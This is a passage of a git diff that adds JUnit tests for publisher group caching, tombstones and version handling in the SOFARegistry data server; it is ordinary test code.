Assert.assertTrue(envelope.isConnectId(publisher.connectId())); + Assert.assertFalse(envelope.isConnectId(ConnectId.of("127.0.0.1:9999", "127.0.0.2:9997"))); + + UnPublisher unPublisher = UnPublisher.of(publisher); + envelope = PublisherEnvelope.of(unPublisher); + + Assert.assertNull(envelope.publisher); + Assert.assertEquals(unPublisher.registerVersion(), envelope.registerVersion); + Assert.assertNull(envelope.getVersionIfPub()); + Assert.assertEquals(unPublisher.getSessionProcessId(), ServerEnv.PROCESS_ID); + Assert.assertTrue(envelope.tombstoneTimestamp <= System.currentTimeMillis()); + Assert.assertFalse(envelope.isPub()); + Assert.assertFalse(envelope.isConnectId(publisher.connectId())); + Assert.assertFalse(envelope.isConnectId(ConnectId.of("127.0.0.1:9999", "127.0.0.2:9997"))); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupTest.java new file mode 100644 index 000000000..481512128 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupTest.java @@ -0,0 +1,330 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherGroupTest { + @Test + public void testBaseOp() { + final String dataId = "testDataInfoId"; + long start = DatumVersionUtil.nextId(); + Publisher publisher = TestBaseUtils.createTestPublisher(dataId); + PublisherGroup group = new PublisherGroup(publisher.getDataInfoId(), "dc"); + + Assert.assertEquals(group.dataInfoId, publisher.getDataInfoId()); + Assert.assertEquals(group.dataId, publisher.getDataId()); + Assert.assertEquals(group.instanceId, publisher.getInstanceId()); + Assert.assertEquals(group.group, publisher.getGroup()); + Assert.assertEquals(group.dataCenter, "dc"); + Assert.assertTrue(group.getVersion().getValue() > start); + + Datum datum = group.toDatum(); + + Assert.assertEquals(group.dataInfoId, datum.getDataInfoId()); + Assert.assertEquals(group.dataId, datum.getDataId()); + Assert.assertEquals(group.instanceId, datum.getInstanceId()); + Assert.assertEquals(group.group, datum.getGroup()); + Assert.assertEquals(group.dataCenter, datum.getDataCenter()); + Assert.assertEquals(group.getPublishers().size(), datum.getPubMap().size()); + Assert.assertEquals(group.getVersion().getValue(), datum.getVersion()); + + DatumVersion version = group.getVersion(); + DatumVersion v = group.addPublisher(publisher); + Assert.assertTrue(v.getValue() > version.getValue()); + Assert.assertEquals(group.getPublishers().size(), 1); + datum = group.toDatum(); + Assert.assertEquals(group.getPublishers().size(), datum.getPubMap().size()); + Assert.assertTrue(group.getPublishers().get(0) == datum.getPubMap().values().iterator().next()); + + // add same pub, not change + v = group.addPublisher(publisher); + Assert.assertNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + // add version older pub + Publisher older = TestBaseUtils.cloneBase(publisher); + older.setVersion(publisher.getVersion() - 1); + v = group.addPublisher(older); + Assert.assertNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + // add registerTimestamp older pub + older = TestBaseUtils.cloneBase(publisher); + older.setRegisterTimestamp(publisher.getRegisterTimestamp() - 1); + v = group.addPublisher(older); + Assert.assertNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + // add newer version + Publisher newer = TestBaseUtils.createTestPublisher(dataId); + newer.setRegisterId(publisher.getRegisterId()); + v = group.addPublisher(newer); + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + Assert.assertTrue(group.getPublishers().get(0) == newer); + + final ProcessId mockProcessId = new ProcessId("xxx", System.currentTimeMillis(), 1, 1); + v = group.clean(mockProcessId, CleanContinues.ALWAYS); + Assert.assertNull(v); + + v = group.clean(null, CleanContinues.ALWAYS); + Assert.assertNotNull(v); + Assert.assertTrue(group.getPublishers().isEmpty()); + + group.addPublisher(newer); + v = group.clean(ServerEnv.PROCESS_ID, CleanContinues.ALWAYS); + Assert.assertNotNull(v); + Assert.assertTrue(group.getPublishers().isEmpty()); + + group.addPublisher(newer); + v = group.remove(ServerEnv.PROCESS_ID, Collections.EMPTY_MAP); + Assert.assertNull(v); + + v = group.remove(mockProcessId, Collections.EMPTY_MAP); + Assert.assertNull(v); + + v = + group.remove( + ServerEnv.PROCESS_ID, + Collections.singletonMap( + newer.getRegisterId(), + new RegisterVersion(newer.getVersion() + 1, newer.getRegisterTimestamp()))); + Assert.assertNull(v); + Assert.assertFalse(group.getPublishers().isEmpty()); + + v = + group.remove( + ServerEnv.PROCESS_ID, + Collections.singletonMap( + newer.getRegisterId(), + new RegisterVersion(newer.getVersion(), newer.getRegisterTimestamp() + 1))); + Assert.assertNull(v); + Assert.assertFalse(group.getPublishers().isEmpty()); + + v = + group.remove( + ServerEnv.PROCESS_ID, + Collections.singletonMap( + newer.getRegisterId() + "aa", + new RegisterVersion(newer.getVersion(), newer.getRegisterTimestamp()))); + Assert.assertNull(v); + Assert.assertFalse(group.getPublishers().isEmpty()); + + v = + group.remove( + ServerEnv.PROCESS_ID, + Collections.singletonMap( + newer.getRegisterId(), + new RegisterVersion(newer.getVersion(), newer.getRegisterTimestamp()))); + Assert.assertNotNull(v); + Assert.assertTrue(group.getPublishers().isEmpty()); + + // has tombstone + v = group.addPublisher(newer); + Assert.assertNull(v); + Assert.assertTrue(group.getPublishers().isEmpty()); + + int compactCount = group.compact(Long.MIN_VALUE); + Assert.assertEquals(0, compactCount); + compactCount = group.compact(Long.MAX_VALUE); + Assert.assertEquals(1, compactCount); + // add again + + v = group.addPublisher(newer); + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + // remove processId=null, no tombstone + v = + group.remove( + null, + Collections.singletonMap( + newer.getRegisterId(), + new RegisterVersion(newer.getVersion(), newer.getRegisterTimestamp()))); + Assert.assertNotNull(v); + Assert.assertTrue(group.getPublishers().isEmpty()); + + v = group.addPublisher(newer); + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + Assert.assertTrue(group.toString().length() != 0); + } + + @Test + public void testUpdate() { + final String dataId = "testDataInfoId"; + Publisher publisher = TestBaseUtils.createTestPublisher(dataId); + PublisherGroup group = new PublisherGroup(publisher.getDataInfoId(), "dc"); + DatumVersion startV = group.getVersion(); + DatumVersion v = group.put(Lists.newArrayList(publisher, publisher)); + Assert.assertNotNull(v); + Assert.assertTrue(v.getValue() > startV.getValue()); + Assert.assertEquals(group.getPublishers().size(), 1); + Assert.assertEquals(group.getPublishers().get(0), publisher); + + Publisher older = TestBaseUtils.cloneBase(publisher); + older.setVersion(older.getVersion() - 1); + v = group.put(Lists.newArrayList(older)); + Assert.assertNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + Assert.assertEquals(group.getPublishers().get(0), publisher); + + Publisher newer = TestBaseUtils.cloneBase(publisher); + newer.setVersion(publisher.getVersion() + 1); + v = group.put(Lists.newArrayList(older, newer)); + + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + Assert.assertEquals(group.getPublishers().get(0), newer); + + Assert.assertEquals(group.getSessionProcessIds().size(), 1); + Assert.assertTrue(group.getSessionProcessIds().contains(ServerEnv.PROCESS_ID)); + + DatumSummary summary = group.getSummary("xxx"); + Assert.assertEquals(summary.getDataInfoId(), group.dataInfoId); + Assert.assertEquals(summary.getPublisherVersions().size(), 0); + + summary = group.getSummary(publisher.getTargetAddress().getIpAddress()); + Assert.assertEquals(summary.getPublisherVersions().size(), 1); + + final ProcessId mockProcessId = + new ProcessId(ServerEnv.PROCESS_ID.getHostAddress(), System.currentTimeMillis(), 1, 1); + + Publisher add = TestBaseUtils.createTestPublisher(dataId); + add.setTargetAddress(URL.valueOf("192.168.1.1:1000")); + add.setSessionProcessId(mockProcessId); + v = group.put(Lists.newArrayList(add)); + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 2); + Assert.assertTrue(group.getPublishers().contains(newer)); + Assert.assertTrue(group.getPublishers().contains(add)); + + summary = group.getSummary(publisher.getTargetAddress().getIpAddress()); + Assert.assertEquals(summary.getPublisherVersions().size(), 2); + + summary = group.getSummary(null); + Assert.assertEquals(summary.getPublisherVersions().size(), 2); + + Assert.assertEquals(group.getSessionProcessIds().size(), 2); + Assert.assertTrue(group.getSessionProcessIds().contains(ServerEnv.PROCESS_ID)); + Assert.assertTrue(group.getSessionProcessIds().contains(mockProcessId)); + + Map conns = group.getByConnectId(ConnectId.of("unknown:999", "unknown:999")); + Assert.assertTrue(conns.isEmpty()); + + conns = group.getByConnectId(add.connectId()); + Assert.assertEquals(conns.size(), 1); + Assert.assertEquals(conns.get(add.getRegisterId()), add); + + conns = group.getByConnectId(newer.connectId()); + Assert.assertEquals(conns.size(), 1); + Assert.assertEquals(conns.get(newer.getRegisterId()), newer); + + v = + group.remove( + mockProcessId, Collections.singletonMap(add.getRegisterId(), add.registerVersion())); + Assert.assertNotNull(v); + Assert.assertEquals(group.getPublishers().size(), 1); + + Assert.assertEquals(group.getSessionProcessIds().size(), 1); + Assert.assertTrue(group.getSessionProcessIds().contains(ServerEnv.PROCESS_ID)); + + summary = group.getSummary(null); + Assert.assertEquals(summary.getPublisherVersions().size(), 1); + + conns = group.getByConnectId(add.connectId()); + Assert.assertEquals(conns.size(), 0); + + conns = group.getByConnectId(newer.connectId()); + Assert.assertEquals(conns.size(), 1); + Assert.assertEquals(conns.get(newer.getRegisterId()), newer); + } + + // public static void main(String[] args) { + // Map m = Maps.newConcurrentMap(); + // Set set = new HashSet<>(); + // int C = 2000; + // int T = 100; + // for (int i = 0; i < C; i++) { + // String k = System.currentTimeMillis() + + // "_dasddsadasdadadasdasagagsdafagasfasfadsdsdsadadasdasf" + i; + // m.put(k, new DatumVersion(System.currentTimeMillis())); + // if (i < T) { + // set.add(k); + // } + // } + // + // System.out.println("" + m.size() + "@" + set.size()); + // for (int i = 0; i < 1000000; i++) { + // scan(m, set); + // } + // + // for (int i = 0; i < 1000000; i++) { + // get(m, set); + // } + // + // long start = System.currentTimeMillis(); + // for (int i = 0; i < 1000000; i++) { + // scan(m, set); + // } + // + // System.out.println("" + (System.currentTimeMillis() - start)); + // start = System.currentTimeMillis(); + // for (int i = 0; i < 1000000; i++) { + // get(m, set); + // } + // System.out.println("" + (System.currentTimeMillis() - start)); + // } + // + // static Map scan(Map m, Set targets) { + // Map ret = Maps.newHashMapWithExpectedSize(targets.size()); + // for (Map.Entry e : m.entrySet()) { + // if (targets.contains(e.getKey())) { + // ret.put(e.getKey(), e.getValue()); + // } + // } + // return ret; + // } + // + // static Map get(Map m, Set targets) { + // Map ret = Maps.newHashMapWithExpectedSize(targets.size()); + // for (String k : targets) { + // DatumVersion v = m.get(k); + // if (v != null) { + // ret.put(k, v); + // } + // } + // return ret; + // } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupsTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupsTest.java new file mode 100644 index 000000000..039e22445 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/cache/PublisherGroupsTest.java @@ -0,0 +1,415 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.data.TestBaseUtils; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherGroupsTest { + private final String testDataId = TestBaseUtils.TEST_DATA_ID; + private final String testDataInfoId = TestBaseUtils.TEST_DATA_INFO_ID; + private final String testDc = "testDc"; + + @Test + public void testEmpty() { + PublisherGroups groups = new PublisherGroups(testDc); + assertEmpty(groups, testDataInfoId); + Assert.assertTrue(groups.toString().length() != 0); + } + + @Test + public void testCreate() { + PublisherGroups groups = new PublisherGroups(testDc); + PublisherGroup group = groups.createGroupIfAbsent(testDataInfoId); + Assert.assertNotNull(group); + PublisherGroup group1 = groups.createGroupIfAbsent(testDataInfoId); + Assert.assertTrue(group == group1); + group1 = groups.createGroupIfAbsent(testDataInfoId + "tt"); + Assert.assertTrue(group != group1); + } + + @Test + public void testPut() { + PublisherGroups groups = new PublisherGroups(testDc); + PublisherGroup group = groups.createGroupIfAbsent(testDataInfoId); + Assert.assertNotNull(group); + Publisher publisher = TestBaseUtils.createTestPublisher(testDataId); + DatumVersion v = groups.put(publisher.getDataInfoId(), Collections.singletonList(publisher)); + Assert.assertNotNull(v); + // add again + v = groups.put(publisher.getDataInfoId(), Collections.singletonList(publisher)); + Assert.assertNull(v); + + Datum datum = groups.getDatum(publisher.getDataInfoId()); + Assert.assertNotNull(datum); + TestBaseUtils.assertEquals(datum, publisher); + v = groups.getVersion(publisher.getDataInfoId()); + Assert.assertEquals(datum.getVersion(), v.getValue()); + Map vers = groups.getVersions(null); + Assert.assertEquals(vers.size(), 1); + Assert.assertEquals(vers.get(publisher.getDataInfoId()), v); + Map publisherMap = groups.getByConnectId(publisher.connectId()); + Assert.assertEquals(publisherMap.size(), 1); + Assert.assertEquals(publisherMap.get(publisher.getRegisterId()), publisher); + Map datumMap = groups.getAllDatum(); + Assert.assertEquals(datumMap.size(), 1); + Assert.assertTrue(datumMap.containsKey(publisher.getDataInfoId())); + Map> publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 1); + Assert.assertEquals(publishers.get(publisher.getDataInfoId()).get(0), publisher); + + Map summaryMap = groups.getSummary("noFound"); + Assert.assertEquals(summaryMap.size(), 0); + + summaryMap = groups.getSummary(null); + Assert.assertEquals(summaryMap.size(), 1); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + + summaryMap = groups.getSummary(publisher.getTargetAddress().getIpAddress()); + Assert.assertEquals(summaryMap.size(), 1); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + + Set processIds = groups.getSessionProcessIds(); + Assert.assertEquals(processIds.size(), 1); + Assert.assertTrue(processIds.contains(publisher.getSessionProcessId())); + + Publisher publisher2 = TestBaseUtils.createTestPublisher(testDataId + "aa"); + v = groups.put(publisher2.getDataInfoId(), Collections.singletonList(publisher2)); + Assert.assertNotNull(v); + + datum = groups.getDatum(publisher2.getDataInfoId()); + Assert.assertNotNull(datum); + TestBaseUtils.assertEquals(datum, publisher2); + v = groups.getVersion(publisher2.getDataInfoId()); + Assert.assertEquals(datum.getVersion(), v.getValue()); + vers = groups.getVersions(null); + Assert.assertEquals(vers.size(), 2); + Assert.assertEquals(vers.get(publisher2.getDataInfoId()), v); + publisherMap = groups.getByConnectId(publisher.connectId()); + Assert.assertEquals(publisherMap.size(), 2); + Assert.assertEquals(publisherMap.get(publisher.getRegisterId()), publisher); + Assert.assertEquals(publisherMap.get(publisher2.getRegisterId()), publisher2); + publisherMap = groups.getByConnectId(TestBaseUtils.notExistConnectId()); + Assert.assertEquals(publisherMap.size(), 0); + datumMap = groups.getAllDatum(); + Assert.assertEquals(datumMap.size(), 2); + Assert.assertTrue(datumMap.containsKey(publisher.getDataInfoId())); + Assert.assertTrue(datumMap.containsKey(publisher2.getDataInfoId())); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher.getDataInfoId()).get(0), publisher); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).get(0), publisher2); + + summaryMap = groups.getSummary("noFound"); + Assert.assertEquals(summaryMap.size(), 0); + + summaryMap = groups.getSummary(null); + Assert.assertEquals(summaryMap.size(), 2); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + Assert.assertEquals( + summaryMap + .get(publisher2.getDataInfoId()) + .getPublisherVersions() + .get(publisher2.getRegisterId()), + publisher2.registerVersion()); + + summaryMap = groups.getSummary(publisher.getTargetAddress().getIpAddress()); + Assert.assertEquals(summaryMap.size(), 2); + Assert.assertEquals( + summaryMap + .get(publisher.getDataInfoId()) + .getPublisherVersions() + .get(publisher.getRegisterId()), + publisher.registerVersion()); + Assert.assertEquals( + summaryMap + .get(publisher2.getDataInfoId()) + .getPublisherVersions() + .get(publisher2.getRegisterId()), + publisher2.registerVersion()); + + processIds = groups.getSessionProcessIds(); + Assert.assertEquals(processIds.size(), 1); + Assert.assertTrue(processIds.contains(publisher.getSessionProcessId())); + Assert.assertTrue(processIds.contains(publisher2.getSessionProcessId())); + } + + @Test + public void testUpdateRemove() { + PublisherGroups groups = new PublisherGroups(testDc); + Publisher publisher1 = TestBaseUtils.createTestPublisher(testDataId); + Publisher publisher2 = TestBaseUtils.createTestPublisher(testDataId); + ProcessId processId2 = new ProcessId("ip2", System.currentTimeMillis(), 100, 200); + publisher2.setSessionProcessId(processId2); + + DatumVersion v = groups.put(publisher2.getDataInfoId(), Collections.EMPTY_LIST); + Assert.assertNull(v); + v = groups.put(publisher2.getDataInfoId(), Lists.newArrayList(publisher1, publisher2)); + Assert.assertNotNull(v); + Set processIds = groups.getSessionProcessIds(); + Assert.assertEquals(processIds.size(), 2); + Assert.assertTrue(processIds.contains(publisher1.getSessionProcessId())); + Assert.assertTrue(processIds.contains(publisher2.getSessionProcessId())); + + Publisher publisher3 = TestBaseUtils.createTestPublisher(testDataId + "-3"); + publisher3.setTargetAddress(URL.valueOf("ip3:1000")); + v = groups.put(publisher3.getDataInfoId(), Lists.newArrayList(publisher3)); + Assert.assertNotNull(v); + processIds = groups.getSessionProcessIds(); + Assert.assertEquals(processIds.size(), 2); + Assert.assertTrue(processIds.contains(publisher1.getSessionProcessId())); + Assert.assertTrue(processIds.contains(publisher2.getSessionProcessId())); + + Map publisherMap = groups.getByConnectId(publisher3.connectId()); + Assert.assertEquals(publisherMap.size(), 1); + Assert.assertEquals(publisherMap.get(publisher3.getRegisterId()), publisher3); + + publisher2 = TestBaseUtils.cloneBase(publisher2); + publisher2.setVersion(publisher2.getVersion() + 1); + + publisher3 = TestBaseUtils.cloneBase(publisher3); + publisher3.setRegisterTimestamp(publisher3.getRegisterTimestamp() + 1); + + Publisher publisher4 = TestBaseUtils.cloneBase(publisher1); + publisher4.setVersion(publisher4.getVersion() - 1); + + v = groups.put(publisher3.getDataInfoId(), Lists.newArrayList(publisher3)); + Assert.assertNotNull(v); + v = + groups.put( + publisher1.getDataInfoId(), Lists.newArrayList(publisher1, publisher2, publisher4)); + Assert.assertNotNull(v); + + Map> publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 1); + + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher1)); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertTrue(publishers.get(publisher3.getDataInfoId()).contains(publisher3)); + + // not remove + v = groups.remove(publisher3.getDataInfoId(), processId2); + Assert.assertNull(v); + + v = groups.remove(publisher3.getDataInfoId(), publisher3.getSessionProcessId()); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + // update again + v = groups.put(publisher3.getDataInfoId(), Lists.newArrayList(publisher3)); + Assert.assertNotNull(v); + v = groups.remove(publisher3.getDataInfoId(), null); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + // now contains publisher1 and publisher2 + v = + groups.remove( + publisher2.getDataInfoId(), + new ProcessId("ip3", System.currentTimeMillis(), 100, 200), + Collections.singletonMap(publisher1.getRegisterId(), publisher1.registerVersion())); + Assert.assertNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + v = + groups.remove( + publisher2.getDataInfoId(), + publisher1.getSessionProcessId(), + Collections.singletonMap( + publisher1.getRegisterId() + "aa", publisher1.registerVersion())); + Assert.assertNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + v = + groups.remove( + publisher2.getDataInfoId(), + publisher1.getSessionProcessId(), + Collections.singletonMap( + publisher1.getRegisterId() + "aa", publisher1.registerVersion())); + Assert.assertNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + v = + groups.remove( + publisher2.getDataInfoId(), + publisher1.getSessionProcessId(), + Collections.singletonMap(publisher1.getRegisterId(), publisher2.registerVersion())); + Assert.assertNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + v = + groups.remove( + publisher2.getDataInfoId(), + publisher1.getSessionProcessId(), + Collections.singletonMap(publisher1.getRegisterId(), publisher1.registerVersion())); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + // update the same publisher1 again failed without compact + v = groups.put(publisher1.getDataInfoId(), Lists.newArrayList(publisher1)); + Assert.assertNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + Assert.assertEquals(groups.tombstoneNum(), 1); + Map compacts = groups.compact(Long.MAX_VALUE); + Assert.assertEquals(groups.tombstoneNum(), 0); + Assert.assertEquals(compacts.size(), 1); + Assert.assertEquals(compacts.get(publisher1.getDataInfoId()).intValue(), 1); + + v = groups.put(publisher1.getDataInfoId(), Lists.newArrayList(publisher1)); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 2); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher1)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + compacts = groups.compact(Long.MAX_VALUE); + Assert.assertEquals(compacts.size(), 0); + + v = + groups.remove( + publisher2.getDataInfoId(), + null, + Collections.singletonMap(publisher1.getRegisterId(), publisher1.registerVersion())); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + // remove with null sessionProcessId, no compact + compacts = groups.compact(Long.MAX_VALUE); + Assert.assertEquals(compacts.size(), 0); + + DatumVersion v1 = groups.updateVersion(publisher2.getDataInfoId()); + Assert.assertTrue(v1.getValue() > v.getValue()); + groups.updateVersion(); + Assert.assertTrue(groups.getVersion(publisher2.getDataInfoId()).getValue() > v.getValue()); + + Map map = + groups.clean(new ProcessId("xxx", 100, 100, 100), CleanContinues.ALWAYS); + Assert.assertTrue(map.isEmpty()); + + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + // remain publisher2 + map = groups.clean(publisher1.getSessionProcessId(), CleanContinues.ALWAYS); + Assert.assertTrue(map.isEmpty()); + + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher2)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + map = groups.clean(publisher2.getSessionProcessId(), CleanContinues.ALWAYS); + Assert.assertTrue(map.get(publisher2.getDataInfoId()).getValue() > v.getValue()); + + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 0); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + v = groups.put(publisher1.getDataInfoId(), Lists.newArrayList(publisher1)); + Assert.assertNotNull(v); + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 1); + Assert.assertTrue(publishers.get(publisher2.getDataInfoId()).contains(publisher1)); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + + compacts = groups.compact(Long.MAX_VALUE); + Assert.assertEquals(compacts.size(), 0); + + map = groups.clean(null, CleanContinues.ALWAYS); + Assert.assertTrue(map.get(publisher2.getDataInfoId()).getValue() > v.getValue()); + + publishers = groups.getAllPublisher(); + Assert.assertEquals(publishers.size(), 2); + Assert.assertEquals(publishers.get(publisher2.getDataInfoId()).size(), 0); + Assert.assertEquals(publishers.get(publisher3.getDataInfoId()).size(), 0); + } + + private void assertEmpty(PublisherGroups groups, String dataInfoId) { + Assert.assertNull(groups.getDatum(dataInfoId)); + Assert.assertNull(groups.getVersion(dataInfoId)); + Assert.assertTrue(groups.getVersions(null).isEmpty()); + Assert.assertTrue(groups.getAllDatum().isEmpty()); + Assert.assertTrue(groups.getAllPublisher().isEmpty()); + } +} diff --git a/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenterTest.java b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenterTest.java new file mode 100644 index 000000000..8ce232fc4 --- /dev/null +++ b/server/server/data/src/test/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenterTest.java @@ -0,0 +1,328 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.change; + +import static com.alipay.sofa.registry.server.data.change.ChangeMetrics.*; + +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import 